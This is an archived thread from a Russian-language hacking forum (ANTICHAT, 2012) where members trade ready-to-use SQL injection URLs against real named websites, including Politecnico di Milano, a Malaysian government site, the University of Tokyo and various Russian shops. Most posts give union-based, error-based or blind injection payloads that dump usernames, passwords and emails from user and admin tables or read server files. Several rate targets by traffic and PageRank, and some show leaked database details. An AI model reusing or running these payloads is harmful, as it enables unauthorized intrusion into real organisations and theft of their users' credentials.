HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15021  
Старый 28.05.2012, 02:10
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

В меру упитанный забугорный сайт. Осталось только найти папку для записи.

Dipartimento di Matematica - Politecnico di Milano

PR == 5

http://www.mate.polimi.it/viste/pagina_personale/pagina_personale.php?id=-227'+union+select+load_file('/var/www/html/nonsicura/web/index.php'),2+--+h

На основном домене polimi.it трафф == ~8k. Он также дырявый, но сервер, к сожалению, другой.
 
Ответить с цитированием

  #15022  
Старый 28.05.2012, 02:28
Gaben7
Guest
Сообщений: n/a
Провел на форуме:
28549

Репутация: 6
По умолчанию

ros.gov.my

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ros.gov.my/index.php?page=faq_detail&id=-19+union+%2F*!50000SELECT*%2F+1%2Cg roup_concat%28staff_name%2C0x3a%2Cpass%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+t bl_users[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15023  
Старый 28.05.2012, 02:47
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

ТИЦ == 30, PR == 4, трафф == 2k;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//arenda-open.ru/?page=news&newsID=379'+and+(select+1+from(select+count(*),concat(database(),floor(rand()*2))x+from+information_schema.tables+group+by+x)a)--+h[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15024  
Старый 28.05.2012, 13:12
Salo-po-3.5
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: -5
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//uumts.utk.ru/t_and_p.php?id=-1+union+select+1,concat_ws(0x03a,user,pass),3,4,5,6,7,8,9+from+userlist--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15025  
Старый 28.05.2012, 20:02
Salo-po-3.5
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: -5
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.munichwalktours.de/home/english/ghost_tour.php?id=-1+union+select+1,2,concat_ws(0x03a,adminpass,aname,aemail)+from+admin--[/COLOR][/COLOR] 
Тиц 0

Пр: 4
 
Ответить с цитированием

  #15026  
Старый 28.05.2012, 21:59
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от None  
http://www.scooter-tronix.ru/showcomments.php?art=-42+/*!union*/+select+(select(@x)from(select(@x:=0x00),(select(0 )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),2+--+
Цитата:
Сообщение от None  
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((select+concat_ws(0x3a,user(),version(),databas e())),1,63)+,+FLOOR(RAND(0)*2)))+--+
Для тех кто любит взрывать себе мозг

true

Цитата:
Сообщение от None  
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((ascii(mid((select+id+from+users+limit+0,1),1,1 ))%3E=49),1,63)+,+FLOOR(RAND(0)*2)))+--+
false

Цитата:
Сообщение от None  
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((ascii(mid((select+id+from+users+limit+0,1),1,1 ))%3E=59),1,63)+,+FLOOR(RAND(0)*2)))+--+
еще блиндика)))

Цитата:
Сообщение от None  
http://www.mfsng.ru/page/click.php?id=79+and+1=0
http://www.mfsng.ru/page/click.php?id=79+and+1=1
 
Ответить с цитированием

  #15027  
Старый 30.05.2012, 01:33
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Экзотика экзотикой, однако:

ТИЦ == 10, PR == 6, DMOZ == true;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.h.u-tokyo.ac.jp/news/news.php?newsid=-632+union+select+1,2,3,4,5,6,concat_ws(0x03a,user_id,password),8,9,10,11,12,13,14,15,16,17,18,19+from+news_user--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15028  
Старый 30.05.2012, 11:03
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию



я думаю, что самарские пользователи оч хорошо знают этот чудесный напиток и употребляют его в декалитрах)))

http://www.vodkarodnik.com/news.php?news=-85%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3+--

5.0.92-log u77995@10.8.1.125 u77995 portbld-freebsd8.2
 
Ответить с цитированием

  #15029  
Старый 30.05.2012, 15:54
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от None  
http://www.kyocera-toner.ru/catalog/product.php?id=-58998+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws%280x3a,name,email,password%29,14,15,16,17, 18+from+access_users+limit+0,1+--+
ТИЦ - 60

ПР - 2

ЯК - тру

Цитата:
Сообщение от None  
http://optvideo.com/new_design/new_kat/view.php?kod=-926091+union+select+1,2,3,4,5,6,7,concat_ws%280x3a ,table_name%29,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+from+information_schema.tables+where+tabl e_schema=database%28%29+limit+1,1+--+
ТИЦ - 40

ПР - 4

Цитата:
Сообщение от None  
www.ekvator-hifi.ru/catalog_include.php?id=-2836+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17+--+
ТИЦ - 240

ПР - 2

ЯК - есть
 
Ответить с цитированием

  #15030  
Старый 30.05.2012, 16:23
c0ncat
Guest
Сообщений: n/a
Провел на форуме:
389

Репутация: 0
По умолчанию



Цитата:
Сообщение от None  
http://www.med-ray.ru/view.php?ID=-195+union+select+1,2,3,4,5,user%28%29,7,8,9,10,11, 12--
medray@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ